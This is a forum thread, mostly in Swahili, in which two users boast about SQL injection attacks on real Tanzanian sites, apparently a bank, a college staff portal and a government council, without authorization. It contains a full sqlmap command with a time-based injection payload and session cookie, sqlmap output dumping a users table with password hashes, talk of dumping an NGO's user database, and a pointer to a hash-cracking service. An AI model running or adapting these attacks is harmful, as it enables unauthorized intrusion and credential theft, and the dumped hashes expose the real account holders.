Sweet Links For Every Hacker & Other IT Experts

[the great wizard]

Ok

working on our vulnerable target

 

[Thefreedom]

working on our vulnerable target
View attachment 1086559

Inakuja hio hehehhe

 

[the great wizard]

Inakuja hio hehehhe

sqlmap got a 303 redirect to 'https://mkombozibank.co.tz/login'. Do you want to follow? [Y/n] n
si hakuna umuhimu wa kufuata hizo redirects

 

[Thefreedom]

sqlmap got a 303 redirect to 'https://mkombozibank.co.tz/login'. Do you want to follow? [Y/n] n
si hakuna umuhimu wa kufuata hizo redirects

Ukiiifuata haina shida hio payload niliofuma hapo inalabua hadi redirect

 

[the great wizard]

Inakuja hio hehehhe

sema hii ni blind attack inakuwa ngumu attacker anakuwa haijui db kiundani

 

[the great wizard]

Ukiiifuata haina shida hio payload niliofuma hapo inalabua hadi redirect

fresh ngoja nione kama nitaweza ku dump chochote

 

[Thefreedom]

sema hii ni blind attack inakuwa ngumu attacker anakuwa haijui db kiundani

Eeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholes

 

[the great wizard]

Eeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholes

yeah ngoja niiache iendelee ntakuja na feedback

 

[the great wizard]

Eeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholes

32 db found, site is volnurable

 

[Thefreedom]

32 db found, site is volnurable
View attachment 1086638

Hehehhehehehe nilijua tu huo mkeka huwez tema... Unapandisha loopholes kilazima

 

[the great wizard]

Hehehhehehehe nilijua tu huo mkeka huwez tema... Unapandisha loopholes kilazima

sema bds zipo nyingi apo inabidi ucheki atleast moja baada ya nyingine ili uweze kupata yenye sensitive information

 

[Thefreedom]

sema bds zipo nyingi apo inabidi ucheki atleast moja baada ya nyingine ili uweze kupata yenye sensitive information

Hapo me na shetani nimempandisha tyr sema sasa hao wajamaaa wan idz yan system yao ina record rogs wameupdate juz

 

[the great wizard]

Hapo me na shetani nimempandisha tyr sema sasa hao wajamaaa wan idz yan system yao ina record rogs wameupdate juz

nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash

 

[Thefreedom]

nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash

Tumia hio hashkiller.co.uk/

 

[Thefreedom]

nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash

Wako fsh on md5 https://hashkiller.co.uk/

 

[Thefreedom]

nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash

Hao nao waoga yani nimesuka hio lakn server inakimbia

sqlmap.py -u "http://ifmsis.ac.tz/staffis/account/login.php" --data="loginBtn=Login&checkbox=checkbox&pass=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&user=cbwimtag" -p pass --cookie="PHPSESSID=pdblvlaiv8b9sjn7hu5q7chs25" --referer="http://ifmsis.ac.tz" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" --no-cast --technique=BEUS --random-agent --tamper=space2comment --risk=3 --level=3 --timeout=2 --ignore-proxy --flush-session -v 1 --dbs

 

[Thefreedom]

nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash

Shit ziko nyingi sana ndo maana tunaipenda TANZANIA hatuamiii

Public hapa sana .

 

[the great wizard]

Wako fsh on md5 https://hashkiller.co.uk/

Hao nao waoga yani nimesuka hio lakn server inakimbia

sqlmap.py -u "http://ifmsis.ac.tz/staffis/account/login.php" --data="loginBtn=Login&checkbox=checkbox&pass=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&user=cbwimtag" -p pass --cookie="PHPSESSID=pdblvlaiv8b9sjn7hu5q7chs25" --referer="http://ifmsis.ac.tz" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" --no-cast --technique=BEUS --random-agent --tamper=space2comment --risk=3 --level=3 --timeout=2 --ignore-proxy --flush-session -v 1 --dbs

Sawa kiongozi ngoja kwanza niingie afternoon session then nikitoka nije nijaribu kufanya hizo vitu

 

[the great wizard]

Wako fsh on md5 https://hashkiller.co.uk/

Embu jaribu ku decrypt hizi hash
+-----------+---------------------------------------------------+-----------+----+
| user_name | pwd | full_name | id |
+-----------+---------------------------------------------------+-----------+----+
| admin | 6372891d0bf5840daa1987b01c4e585178da3cf71970e67da | ll | 54 |
| ictu | a310c6646b8f0f41124c72e1033f684e4c95b1251bb5aeef2 | ictu | 72 |
| tnnc | ebc6fca238f9c434eb120b3ffe8ae79763b7f1f02ea886219 | tnnc | 73 |
| skid | 828e7e100800bbb1e8cbfa4a49527005bae62a53faf492e00 | <blank> | 74 |
| 155 | fa574698ea13f7743323532fb46ddca236aed900dc0cbb1e5 | <blank> | 75 |
| 144 | b8df1868e2c34a423f535234952356286d041e8e16d350993 | <blank> | 76 |
+-----------+---------------------------------------------------+-----------+----+

[12:34:06] [INFO] table 'tnnc_db.users' dumped to CSV file '/root/.sqlmap/output/www.tnnc.go.tz/dump/tnnc_db/users.csv'
[12:34:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.tnnc.go.tz'

[*] ending @ 12:34:06 /2019-05-03/

┌─[root@parrot]─[~]
└──╼ #

 

[the great wizard]

Hahaha! See you there at ur terminal..
gud job bro.

┌─[root@parrot]─[~]
└──╼ #
wewe ndio security admin wao nini?